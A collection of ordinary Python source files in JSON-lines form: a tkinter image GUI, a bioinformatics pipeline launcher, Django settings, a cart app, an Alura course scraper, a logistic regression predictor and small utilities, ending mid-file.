self.LoadImage(self.imageList[self.curImgNumber])\n\n def classifySingleImage(self):\n # print(\"classify single image\")\n messagebox.showinfo(\"Results\", \"I don't know\")\n\n def classifyAllImages(self):\n # print(\"classify all images\")\n messagebox.showinfo(\"Results\", \"I don't know\")\n\n def ImportFolder(self):\n self.imageFolderDir = listdir(self.defaultImgDir)\n self.imageList = []\n for image in self.imageFolderDir:\n # print(image)\n self.imageList.append(image)\n self.total = len(self.imageList)\n\n def DebugIncreaseList(self):\n print(\"increase\")\n # print(self.imageList)\n\n def ListboxSelected(self, event=None):\n idxs = self.imageListbox.curselection()\n if len(idxs) == 1:\n idx = int(idxs[0])\n self.curImgNumber = idx\n # print(\"select index %d\" % (idx))\n self.imageListbox.see(idx)\n name = self.imageList[idx]\n self.LoadImage(name)\n\n def LoadImage(self, name):\n\n if name != \"\":\n self.progLabel.config(text=\"%04d/%04d\" % (self.curImgNumber + 1, self.totalImgNumber))\n self.imageNameMsg.set(\"Image Loaded: %s\" % (name))\n\n if self.ImgDir != \"\":\n filename = self.ImgDir + name\n else:\n filename = self.defaultImgDir + name\n\n self.img = ImageTk.PhotoImage(Image.open(filename))\n # Canvas_Image = self.canvas.create_image(100,150,image = self.img)\n\n self.canvas.config(width=max(self.img.width(), 300), height=max(self.img.height(), 300))\n self.canvas.create_image(0, 0, image=self.img, anchor=NW)\n # self.canvas.config(text = \"%04d/%04d\" %(2, 5))\n\n '''\n def loadImage(self):\n\n idxs = self.imageListbox.curselection()\n if len(idxs) == 1:\n idx = int(idxs[0])\n self.imageListbox.see(idx)\n name = self.imageList[idx]\n self.imageNameMsg.set(\"Image Loaded: %s\" % (name))\n\n if name != \"\":\n filename = self.initdir + name\n self.img = ImageTk.PhotoImage(Image.open(filename))\n self.canvas.config(width = max(self.img.width(), 400), height = max(self.img.height(), 400))\n self.canvas.create_image(0, 0, image = self.tkimg, anchor=NW)\n self.progLabel.config(text = \"%04d/%04d\" %(self.cur, self.total))\n '''\n\n def Classify(self):\n messagebox.showinfo(\"Results\", \"I don't know\")\n self.updateListboxImage()\n\n def LoadFromDir(self, dbg=False):\n result = filedialog.askdirectory(title=\"Select a Folder to import images\")\n if result != \"\":\n\n self.entryFolderName.set(result)\n print(\"Loaded from: \" + result)\n self.ImgDir = result + \"/\"\n self.imageFolderDir = [f for f in listdir(self.ImgDir) if re.match(r'.*\\.png', f)]\n if len(self.imageFolderDir) == 0:\n messagebox.showinfo(\"Warning\", \"No png files in selected folder.\")\n self.imageList = []\n for image in self.imageFolderDir:\n print(image)\n self.imageList.append(image)\n self.UpdateListboxImage()\n self.totalImgNumber = len(self.imageList)\n else:\n messagebox.showinfo(\"Warning\", \"Folder not loaded\")\n\n def LoadDir(self, dbg=False):\n self.imageFolderDir = listdir(self.initdir)\n self.imageList = []\n for image in self.imageFolderDir:\n print(image)\n self.imageList.append(image)\n self.UpdateListboxImage()\n self.totalImgNumber = len(self.imageList)\n\n def UpdateListboxImage(self):\n self.imageListbox.delete(0, END)\n for image in self.imageList:\n self.imageListbox.insert(END, image)\n\n\nif __name__ == '__main__':\n root = Tk()\n gui = GUI(root)\n root.mainloop()","sub_path":"tst.py","file_name":"tst.py","file_ext":"py","file_size_in_byte":10488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"338894724","text":"#!/usr/bin/env python\n\n''' \n * All rights Reserved, Designed By HIT-Bioinformatics \n * @Title: process.py\n * @Package: argparse, pysam, sys\n * @Description: Control the nTED pipeline\n * @author: tjiang\n * @date: Apr 24 2018\n * @version V1.0 \n'''\n\nimport argparse\nimport sys\nimport pysam\nimport extract, Map, call_TE\n# from process import *\n\nSTAGES = {\"detection\": extract.run, \\\n \"realignment\": Map.run, \\\n \"calling\": call_TE.run}\n\nVERSION=\"1.0.2\"\n\nUSAGE = \"\"\"\\\n _ ___ _ _____ _______ _\n _ _ | ^_ _^ | | ___| |__ __| | |\n | ^_| | | | | | | | |__ | | | |\n | | | | | | | | | __| | | | |\n | | | | | | | | | |___ | | | |___\n |_| |_| |_| |_| |_____| |_| |_____|\n\n rMETL - realignment-based Mobile Element insertion detection Tool for Long read\n\n STAGE is one of\n detection Inference of putative MEI loci.\n realignment Realignment of chimeric read parts.\n calling Mobile Element Insertion calling.\n \n See README.md for documentation or --help for details\n \n rMETL V%s\n\"\"\"%(VERSION)\n\ndef parseArgs():\n\n\tparser = argparse.ArgumentParser(prog=\"process.py\", description=USAGE, formatter_class=argparse.RawDescriptionHelpFormatter)\n\n\t# parser.add_argument(\"-h\", \"--help\", action=\"store_true\")\n\tparser.add_argument(\"stage\", metavar=\"STAGE\", choices=STAGES.keys(), type=str, help=\"Stage to execute\")\n\tparser.add_argument(\"options\", metavar=\"OPTIONS\", nargs=argparse.REMAINDER, help=\"Options to pass to the stage\")\n\n\targs = parser.parse_args()\n\n\tSTAGES[args.stage](args.options)\n\nif __name__ == '__main__':\n\tparseArgs()","sub_path":"scripts/Detection/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"548569072","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\n\nPROJECT_ROOT = os.path.normpath(\n os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\nfor d in [\"apps\"]:\n if os.path.join(PROJECT_ROOT, d) not in sys.path:\n sys.path.insert(0, os.path.join(PROJECT_ROOT, d))\n\nDEBUG = False\nTEMPLATE_DEBUG = DEBUG\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': '{{ project_name }}',\n 'USER': '{{ project_name }}',\n # see settings/_local.py on production\n 'PASSWORD': '{{ project_name }}'\n }\n}\n\nADMINS = (\n ('Super Man', 'superman@example.com'),\n)\n\nMANAGERS = ADMINS\n\nEMAIL_HOST = 'smtp.gmail.com'\nEMAIL_PORT = '587'\nEMAIL_HOST_USER = 'noreply@{{ project_name }}.TODO'\nEMAIL_HOST_PASSWORD = '' # see settings/_local.py\nEMAIL_USE_TLS = True\nEMAIL_SUBJECT_PREFIX = '[{{ project_name }}.TODO] '\nDEFAULT_FROM_EMAIL = EMAIL_HOST_USER\n\nALLOWED_HOSTS = ['{{ project_name }}.example.com', ]\n\nSITE_ID = 1\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# On Unix systems, a value of None will cause Django to use the same\n# timezone as the operating system.\n# If running in a Windows environment this must be set to the same as your\n# system time zone.\nTIME_ZONE = None\n\n# If you set this to False, Django will not use timezone-aware datetimes.\nUSE_TZ = True\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\n#LANGUAGE_CODE = 'en'\n\n#gettext = lambda s: s\n#LANGUAGES = (\n# ('ru', gettext('Russian')),\n# ('en', gettext('English')),\n#)\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# A boolean that specifies if data will be localized by default or not. If\n# this is set to True, e.g. Django will display numbers and dates using\n# the format of the current locale.\nUSE_L10N = True\n\n# Absolute filesystem path to the directory that will hold user-uploaded files.\n# Example: \"/home/media/media.lawrence.com/\"\nMEDIA_ROOT = '%s/media/uploads' % PROJECT_ROOT\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash.\n# Examples: \"http://media.lawrence.com\", \"http://example.com/media/\"\nMEDIA_URL = '/media/uploads/'\n\n# Absolute path to the directory static files should be collected to.\n# Don't put anything in this directory yourself; store your static files\n# in apps' \"static/\" subdirectories and in STATICFILES_DIRS.\n# Example: \"/home/media/media.lawrence.com/static/\"\nSTATIC_ROOT = '%s/media/static' % PROJECT_ROOT\n\n# URL prefix for static files.\n# Example: \"http://media.lawrence.com/static/\"\nSTATIC_URL = '/media/static/'\n\n# Additional locations of static files\nSTATICFILES_DIRS = (\n # Put strings here, like \"/home/html/static\" or \"C:/www/django/static\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n '%s/static' % PROJECT_ROOT,\n)\n\n# List of finder classes that know how to find static files in\n# various locations.\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n #'django.contrib.staticfiles.finders.DefaultStorageFinder',\n)\n\n#STATICFILES_STORAGE = \\\n# 'django.contrib.staticfiles.storage.CachedStaticFilesStorage'\n\n# Make this unique, and don't share it with anybody.\n# Should be overridden in settings/_local.py.\nSECRET_KEY = '{{ secret_key }}'\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n ('django.template.loaders.cached.Loader', (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n #'django.template.loaders.eggs.Loader',\n )),\n)\n\nMIDDLEWARE_CLASSES = (\n #'raven.contrib.django.raven_compat.middleware.'\n #'SentryResponseErrorIdMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n # Uncomment the next line for simple clickjacking protection:\n #'django.middleware.clickjacking.XFrameOptionsMiddleware',\n #'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware',\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n \"django.core.context_processors.csrf\",\n \"django.contrib.auth.context_processors.auth\",\n \"django.core.context_processors.debug\",\n #\"django.core.context_processors.i18n\",\n \"django.core.context_processors.media\",\n \"django.core.context_processors.static\",\n \"django.core.context_processors.tz\",\n \"django.contrib.messages.context_processors.messages\",\n \"django.core.context_processors.request\",\n)\n\nROOT_URLCONF = '{{ project_name }}.urls'\n\n# Python dotted path to the WSGI application used by Django's runserver.\nWSGI_APPLICATION = '{{ project_name }}.wsgi.application'\n\nTEMPLATE_DIRS = (\n # Put strings here, like \"/home/html/django_templates\" or\n # \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n '%s/templates' % PROJECT_ROOT,\n)\n\nINSTALLED_APPS = (\n '{{ project_name }}.core',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n #'django.contrib.comments',\n #'django.contrib.flatpages',\n 'grappelli',\n 'django.contrib.admin',\n\n #'ckeditor',\n #'contact_form',\n #'honeypot',\n #'flatblocks',\n #'markitup',\n #'sorl.thumbnail',\n #'rollyourown.seo',\n 'south',\n 'raven.contrib.django.raven_compat',\n)\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': True,\n 'root': {\n 'handlers': ['console', 'sentry'],\n },\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(pathname)s|'\n '%(funcName)s() %(message)s'\n },\n 'simple': {\n 'format': '[%(levelname)s] %(message)s'\n },\n },\n 'handlers': {\n 'sentry': {\n 'level': 'WARNING',\n 'class': 'raven.contrib.django.raven_compat.handlers.'\n 'SentryHandler',\n 'filters': ['require_debug_false']\n },\n 'console': {\n 'level': 'INFO',\n 'class': 'logging.StreamHandler',\n 'formatter': 'simple',\n }\n },\n 'loggers': {\n 'django.db.backends': {\n 'level': 'ERROR',\n 'handlers': ['console'],\n #'propagate': False,\n },\n 'raven': {\n 'level': 'DEBUG',\n 'handlers': ['console'],\n 'propagate': False,\n },\n 'sentry.errors': {\n 'level': 'DEBUG',\n 'handlers': ['console'],\n 'propagate': False,\n },\n },\n}\n\n####### app-specific settings ########\n\nGRAPPELLI_ADMIN_TITLE = '{{ project_name }} admin site'\n\n#CKEDITOR_UPLOAD_PATH = '%s/ckeditor' % MEDIA_ROOT\n#CKEDITOR_CONFIGS = {\n# 'full': {\n# 'toolbar': 'Full',\n# 'language': 'ru',\n# },\n# 'default': {\n# 'toolbar': [\n# ['Bold', 'Italic', '-', 'NumberedList', 'BulletedList', '-',\n# 'Link', 'Unlink', 'Source']\n# ],\n# 'height': 300,\n# 'width': 800,\n# 'language': 'ru',\n# },\n#}\n","sub_path":"project_name/settings/_common.py","file_name":"_common.py","file_ext":"py","file_size_in_byte":7834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"367606038","text":"from django.contrib import admin\n\nfrom core.models import Group, Student\n\n\nclass StudentsInline(admin.StackedInline):\n model = Student\n extra = 0\n\n\nclass GroupAdmin(admin.ModelAdmin):\n inlines = (StudentsInline,)\n list_display = ('name', 'warden', 'students_count')\n\n\nadmin.site.register(Group, GroupAdmin)\n","sub_path":"groups/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"266323464","text":"from bs4 import BeautifulSoup\nfrom http.cookiejar import CookieJar\nimport mechanize\nimport os\n\nliga = 'https://cursos.alura.com.br'\n\n\n# lists properties\ndef _listing(opcoes):\n while True:\n escolha = ''\n os.system('cls')\n print(' | '.join(str(i) for i in opcoes))\n print('Selecione uma das opções:')\n opcao = input()\n for i in opcoes:\n if opcao in i and opcoes:\n escolha = i\n break\n if escolha:\n break\n return escolha\n\n\n# Scraps Alura Formations!\nclass AluraScraper:\n\n def __init__(self, session=None):\n # If called by AluraLogin, uses session from AluraLogin\n if session:\n self._session = session\n self._principal = self._session.open(liga + '/formacoes').read()\n # else if called without AluraLogin, create its own session\n else:\n session = mechanize.Browser()\n self._principal = session.open(liga + '/formacoes').read()\n # properties to save time next time it uses again\n self._categories = None\n self._category = None\n self._formations = None\n\n # Scrap formations videos from json requests and save to data.txt\n def formation_scraper(self, links):\n result = []\n for link in links:\n print(link + '/video')\n req = self._session.open(link + '/video').read()\n result.append(req)\n try:\n os.remove('data.txt')\n except OSError:\n pass\n with open('data.txt', 'w') as f:\n for item in result:\n f.write(f'{item}\\n')\n print('Done! Saved in data.txt')\n\n # Scrap categories and formations from the site\n def _text_scraper(self, tag='li', category=None):\n classes = ['formacoes__item', 'formacao__link']\n links = []\n soup = BeautifulSoup(self._principal, 'html.parser')\n if category is None:\n for a in soup.find_all(tag, class_=classes[0]):\n links.append(a['id'])\n else:\n li = soup.find('li', id=category, recursive=True)\n for i in li.findChildren('a', class_=classes[1]):\n links.append(i['href'])\n return links\n\n # saves categories and formations to the properties\n def formation_categories(self):\n if not self.categories:\n self.categories = self._text_scraper()\n if not self.category:\n self.category = _listing(self.categories)\n if not self.formations:\n self.formations = self._text_scraper(category=self.category)\n\n @property\n def categories(self):\n return self._categories\n\n @categories.setter\n def categories(self, value):\n self._categories = value\n\n @property\n def category(self):\n return self._category\n\n @category.setter\n def category(self, value):\n self._category = value\n\n @property\n def formations(self):\n return self._formations\n\n @formations.setter\n def formations(self, value):\n self._formations = value\n\n\n# Crawls all video links from a formation\nclass AluraCrawler(AluraScraper):\n def __init__(self, session=None):\n self._session = session\n super().__init__(self._session)\n self._link = None\n self._links = None\n\n # Choose formation using href tag list from alura page\n def choose_formation(self, formacoes):\n formacao = _listing(formacoes)\n print(formacao + ' escolhida...')\n self.link = ['https://cursos.alura.com.br' + formacao]\n\n # Crawls every link that has video from a formation\n def formation_crawler(self, lst=None, aux=0):\n if not lst:\n lst = self.link\n classes = ['learning-content__link', 'courseSectionList-section', 'task-menu-nav-item-link-VIDEO']\n links = []\n for link in lst:\n req = self._session.open(link).read()\n links.extend(self.__link_crawler(classes, req, aux))\n print(links)\n if aux < 2:\n return self.formation_crawler(lst=links, aux=aux + 1)\n self.links = links\n\n # submethod for formation_crawler\n @staticmethod\n def __link_crawler(classes, req, aux=0):\n links = []\n soup = BeautifulSoup(req, 'html.parser')\n for a in soup.find_all('a', class_=classes[aux]):\n if a['href'].startswith('/'):\n print(a['href'])\n links.append(liga + a['href'])\n return links\n\n @property\n def link(self):\n return self._link\n\n @link.setter\n def link(self, value):\n self._link = value\n\n @property\n def links(self):\n return self._links\n\n @links.setter\n def links(self, value):\n self._links = value\n\n\n# Login to Alura\nclass AluraLogin(AluraCrawler):\n def __init__(self, user, password):\n cj = CookieJar()\n self._session = mechanize.Browser()\n self._session.set_handle_robots(False)\n self._session.set_cookiejar(cj)\n self._session.open(\"https://cursos.alura.com.br/loginForm\")\n self._session.select_form(nr=1)\n self._session.form['username'] = user\n self._session.form['password'] = password\n self._session.submit()\n super().__init__(self._session)\n","sub_path":"alurascraper.py","file_name":"alurascraper.py","file_ext":"py","file_size_in_byte":5307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"553016964","text":"# %load connect_n.py\n\nWHITE_DISK = '\\u26AA'\nBLACK_DISK = '\\u26AB'\nFW_SPACE = '\\u3000' # fullwidth space\nFW_LINE = '\\u2015' # fullwidth horizontal line\n\n# the game itself\ngame = { \n 'N' : 4, \n 'board':[], # the connect-n board\n 'moves':[] # the moves by players \n}\n\ndef create_board(n):\n '''create the board for the Connect-N game'''\n game['N'] = n\n \n # your code should instead create an empty board with N+3 rows and N+2 Columns\n # example code below, creating a board with 4 rows and 3 columns, with some pre-filled disks\n # 0 - empty, 1 - white disk, 2 - black disk\n board = [[0,1,2],[0,0,0], [0,0,0], [0,0,0]]\n game['board'] = board\n \ndef display_board():\n '''print the board content'''\n \n # Unicode example below. You should update the code below by\n # 1. use a for loop\n # 2. allow it to display board of different sizes\n w = f'{WHITE_DISK:^3}' # white\n b = f'{BLACK_DISK:^3}' # black\n e = f'{FW_SPACE:^3}' # empty\n separator = FW_LINE*20\n \n board = game['board']\n s = ''\n for i in range(game['N']): # you should use nested for loop here\n cell = board[0][i] \n if cell == 0: \n s = s + f'| {e}'\n elif cell == 1:\n s = s + f'| {w}'\n elif cell == 2:\n s = s + f'| {b}'\n print(s)\n \ndef drop_disk(c):\n '''drop disk at column c'''\n print('drop disk at...')\n \ndef check_winning():\n '''check if there is a winner'''\n print('winner is ...')\n \ndef save_board(fname):\n '''save the game'''\n # you should save all the information in the game\n print('save_board')\n \ndef load_board(fname):\n '''load the game'''\n # load the game\n print('load board')\n\ndef show_moves():\n '''show all previous moves'''\n # for example, ['W2', 'B2'] means white drops disk column 2 and black drops disk at column 2\n print('show all moves')\n \n# EXAMPLE SCEANRIO BELOW\n# N = input('Please input the size of your board:')\n\nN = 3 # your code should allow user inputs instead\ncreate_board(N)\ndrop_disk(2) # white drop disk at column 2\ncheck_winning()\ndrop_disk(2) # black drop disk at column 2\ncheck_winning()\ndrop_disk(3) # white drop disk at column 3\ncheck_winning()\ndrop_disk(3) # black drop disk at column 3\ncheck_winning()\ndrop_disk(4) # white drop disk at column 4\ncheck_winning() # white wins because she conencts 3 disks\ndisplay_board()\n","sub_path":"2021S1-Connect-n (1).py","file_name":"2021S1-Connect-n (1).py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"384150848","text":"import sys\n\nfrom tornado.httpserver import HTTPServer\nfrom tornado.ioloop import IOLoop\nfrom tornado.routing import URLSpec\nfrom tornado.web import Application\nfrom tornado_utils2.handlers.ping import PingPongHandler\nfrom app.handlers import *\n\nfrom settings import logger\n\n\ndef main():\n logger.info('Create web app')\n app = Application(\n handlers=[\n URLSpec(r'/ping', PingPongHandler),\n URLSpec(r'/api/v2/by_passport_data', ByPassportData),\n URLSpec(r'/api/v2/by_msisdn', ByMSISDN),\n URLSpec(r'/api/v2/simple_check', SimpleCheck),\n ],\n debug=True,\n )\n\n logger.info(f'Start HTTP server, port 8000')\n server = HTTPServer(app)\n server.application = app\n server.bind(8000)\n server.start()\n\n logger.info('Starting IOLoop')\n IOLoop.current().start()\n\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n logger.info('*' * 30)\n logger.info('Hasta la vista, baby!')\n logger.info('*' * 30)\n sys.exit(0)\n","sub_path":"fake_ids_api.py","file_name":"fake_ids_api.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"290499069","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom django.shortcuts import render, redirect, get_object_or_404\n\nfrom catering.models import CateringProduct\nfrom .models import Cart, CartItem\n\n\ndef _cart_id(request):\n cart = request.session.session_key\n if not cart:\n cart = request.session.create()\n return cart\n\n\ndef cart_details(request, total=0, counter=0, cart_items=None):\n try:\n cart = Cart.objects.get(cart_id=_cart_id(request))\n cart_items = CartItem.objects.filter(cart=cart, active=True)\n for cart_item in cart_items:\n total += cart_item.product.price * cart_item.quantity\n counter += cart_item.quantity\n except ObjectDoesNotExist:\n pass\n\n return render(request, 'cart.html', {\n 'cart_items': cart_items,\n 'total': total,\n 'counter': counter\n })\n\n\ndef add_to_cart(request, slug):\n product = CateringProduct.objects.get(slug=slug)\n try:\n cart = Cart.objects.get(cart_id=_cart_id(request))\n except Cart.DoesNotExist:\n cart = Cart.objects.create(\n cart_id=_cart_id(request)\n )\n cart.save()\n\n try:\n cart_item = CartItem.objects.get(product=product, cart=cart)\n if cart_item.quantity < cart_item.product.stock:\n cart_item.quantity += 1\n cart_item.save()\n except CartItem.DoesNotExist:\n cart_item = CartItem.objects.create(\n product=product,\n quantity=1,\n cart=cart\n )\n cart_item.save()\n return redirect('cart:cart_details_url')\n\n\ndef remove_from_cart(request, slug):\n cart = Cart.objects.get(cart_id=_cart_id(request))\n product = get_object_or_404(CateringProduct, slug=slug)\n cart_item = CartItem.objects.get(product=product, cart=cart)\n if cart_item.quantity > 1:\n cart_item.quantity -= 1\n cart_item.save()\n else:\n cart_item.delete()\n return redirect('cart:cart_details_url')\n\n\ndef full_remove_from_cart(request, slug):\n cart = Cart.objects.get(cart_id=_cart_id(request))\n product = get_object_or_404(CateringProduct, slug=slug)\n cart_item = CartItem.objects.get(product=product, cart=cart)\n cart_item.delete()\n return redirect('cart:cart_details_url')\n","sub_path":"cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"545260872","text":"# This script requires numpy and matplotlib to be installed, but I think you\n# *probably* have those installed.\n\n# If you don't have these, you can install them with pip.\n\nimport math\nimport numpy\nimport matplotlib.pyplot as plt\n\ndef generate_points(tlst):\n xpts = []\n ypts = []\n for t in tlst:\n y = abs(6*t) + 0.25\n x = t\n \n xpts.append(x)\n ypts.append(y)\n \n return xpts, ypts\n\ndef generate_verticals(xpt, ystart, yfin, pts):\n xpts = []\n ypts = []\n for i in numpy.arange(ystart, yfin, (yfin-ystart)/float(pts)):\n xpts.append(xpt)\n ypts.append(i)\n \n \n return xpts, ypts\n \ndef generate_diagonals(ystart, yfin, pts):\n xpts = []\n ypts = []\n \n for i in numpy.arange(-1, 1, (2/float(pts))):\n xpts.append(i)\n \n for i in numpy.arange(ystart, yfin, (yfin-ystart)/float(pts)):\n ypts.append(i)\n \n return xpts, ypts\n \nif __name__ == \"__main__\":\n hbase = 6\n \n plt.title('Love you, Gabrielle!')\n plt.yticks([])\n plt.xticks([])\n\n plt.axis([-2,2,0,11])\n tmp = generate_points(numpy.arange(-1, 1, 0.01))\n plt.plot(tmp[0],tmp[1], 'ro')\n\n tmp = generate_verticals(-0.33, hbase, hbase + 4, 100)\n plt.plot(tmp[0],tmp[1], 'ro')\n\n tmp = generate_verticals(0.33, hbase, hbase + 4, 100)\n plt.plot(tmp[0],tmp[1], 'ro')\n\n tmp = generate_diagonals(hbase + 2 , hbase + 1, 100)\n plt.plot(tmp[0], tmp[1], 'ro')\n\n tmp = generate_diagonals(hbase + 3 , hbase + 2, 100)\n plt.plot(tmp[0], tmp[1], 'ro')\n plt.show()\n","sub_path":"all_the_dibs.py","file_name":"all_the_dibs.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"109806164","text":"#!/usr/bin/env python3\nimport csv\nimport sys\nfrom math import *\nimport numpy as np\n#!/usr/bin/env python3\n\n\ndef sigmoid(x) :\n\treturn (1. / (1. + np.exp(-x)))\n\ndef h(coef, features) :\n\treturn sigmoid(features.T @ coef)\n\ndef scale(tab, min, maxi):\n\tif (min == maxi):\n\t\tmin = 0\n\tfor (i, f) in enumerate(tab):\n\t\ttab[i] = ((f - min) / (maxi - min)) * 2 - 1\n\treturn (tab)\n\n\ndef get_coef(student, coef_g, coef_r, coef_s, coef_h):\n\tguess_g = h(coef_g, student)\n\tguess_r = h(coef_r, student)\n\tguess_s = h(coef_s, student)\n\tguess_h = h(coef_h, student)\n\n\tok = max(guess_g, guess_r, guess_s, guess_h)\n\tif (ok == guess_g):\n\t\treturn (\"Gryffindor\")\n\telif (ok == guess_r):\n\t\treturn (\"Ravenclaw\")\n\telif (ok == guess_s):\n\t\treturn (\"Slytherin\")\n\telif (ok == guess_h):\n\t\treturn (\"Hufflepuff\")\n\nif (len(sys.argv) != 3):\n\tprint(\"Usage: \" + sys.argv[0] + \"file.csv params.npz\")\n\tsys.exit()\n\ntry:\n\tparams = np.load(sys.argv[2])\nexcept:\n\tsys.exit(0)\n\n\ncoef_g = params[\"Gryffindor\"]\ncoef_r = params[\"Ravenclaw\"]\ncoef_s = params[\"Slytherin\"]\ncoef_h = params[\"Hufflepuff\"]\nmin = params[\"min\"]\nmaxi = params[\"max\"]\n\n\n\ntry:\n\tcsvfile = open(sys.argv[1], 'r')\n\thouses = open(\"houses.csv\", 'w+')\nexcept Exception as e:\n\tprint(\"An error occured while opening a file : \" + str(e))\n\tsys.exit()\n\n\nreader = csv.reader(csvfile, delimiter=',')\nfirst = False\n\narray = []\nfor r in reader:\n\tif (first == False):\n\t\tfields = r\n\t\tfirst = True\n\telse:\n\t\tarray.append(r)\nar = np.array(array)\n\n\n\ny = ar[ :, 1]\n\nar[ar == ''] = 0 # TODO ATTENTION AUX NANS\n\nfeatures = np.concatenate((np.ones((len(ar), 1)), ar[:, 6:].astype(np.float64)), axis=1)\n\nfor i in range(np.size(features,1)):\n\tfeatures[ : , i] = scale(features[: , i], min[i], maxi[i])\n\nok = 0\nerror = 0\nstudent = []\n\nfor i, line in enumerate(features):\n\tstudent.append(get_coef(line, coef_g, coef_r, coef_s, coef_h))\n\n\nhouses.write(\"Index,Hogwarts House\\n\")\n\nfor i, line in enumerate(features):\n\tguess = get_coef(line, coef_g, coef_r, coef_s, coef_h)\n\thouses.write(str(i) + \",\" + guess + \"\\n\")\n\n\n\n","sub_path":"logreg_predict.py","file_name":"logreg_predict.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"165062688","text":"def toStr(n, base):\r\n # base основание системы счисления в которую мы хотим конвертиворвать n\r\n # n число которое мы хотим сконвертировать в \r\n\r\n convert = '0123456789abcdef'\r\n if n < base:\r\n return convert[n] + convert[11]\r\n else:\r\n return toStr(n//base, base) + convert[n%base]\r\n\r\nprint(toStr(3,2))","sub_path":"recursion/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"66091197","text":"from lib.scrapy_table import Scrapy_Table\n\nurl_municipios=\"https://pt.wikipedia.org/wiki/Lista_de_munic%C3%ADpios_do_Brasil_por_popula%C3%A7%C3%A3o\"\n\nsite_connect_municipio = Scrapy_Table(url_municipios)\n\nmunicipios_table = site_connect_municipio.get_tables(0)\n\nprint('exercicio 2')\n\nfor municipio in municipios_table[1:]:\n if int(municipio[4]) < 70000:\n #estava apresentando erro de conversão sem o encode\n print(municipio[2].encode('utf8'))\n","sub_path":"modulo1/exercicios/MyCode/exercicios.2.py","file_name":"exercicios.2.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"94535796","text":"#!/usr/bin/env python\r\n# -*- encoding: utf-8 -*-\r\n'''\r\n@File : convertHelper.py\r\n@Date : 2020/11/16\r\n@Author : Yaronzz\r\n@Version : 1.0\r\n@Contact : yaronhuang@foxmail.com\r\n@Desc : \r\n'''\r\n\r\nfrom enum import Enum\r\n\r\n\r\nclass MemoryUnit(Enum):\r\n GB = 0\r\n MB = 1\r\n KB = 2\r\n BYTE = 3\r\n\r\n\r\ndef convertMemoryUnit(num: float, srcUnit: MemoryUnit, desUnit: MemoryUnit) -> float:\r\n \"\"\"Convert memory unit, support gb/mb/kb/byte\r\n\r\n Args:\r\n num (float): value\r\n srcUnit (MemoryUnit): Original unit\r\n desUnit (MemoryUnit): Target unit\r\n \"\"\"\r\n if srcUnit == desUnit:\r\n return num\r\n\r\n try:\r\n num = float(num)\r\n if num == 0:\r\n return 0\r\n srcIndex = srcUnit.value\r\n desIndex = desUnit.value\r\n diff = abs(srcIndex - desIndex)\r\n\r\n while diff != 0:\r\n if srcIndex < desIndex:\r\n num = num * 1024\r\n else:\r\n num = num / 1024\r\n diff -= 1\r\n\r\n return num\r\n except ValueError:\r\n return 0\r\n\r\n\r\ndef convertMemoryUnitAuto(num: float, unit: MemoryUnit, maxUnit: MemoryUnit) -> (float, MemoryUnit):\r\n \"\"\"Automatic conversion to appropriate units\r\n\r\n Args:\r\n num (float): value\r\n MemoryUnit 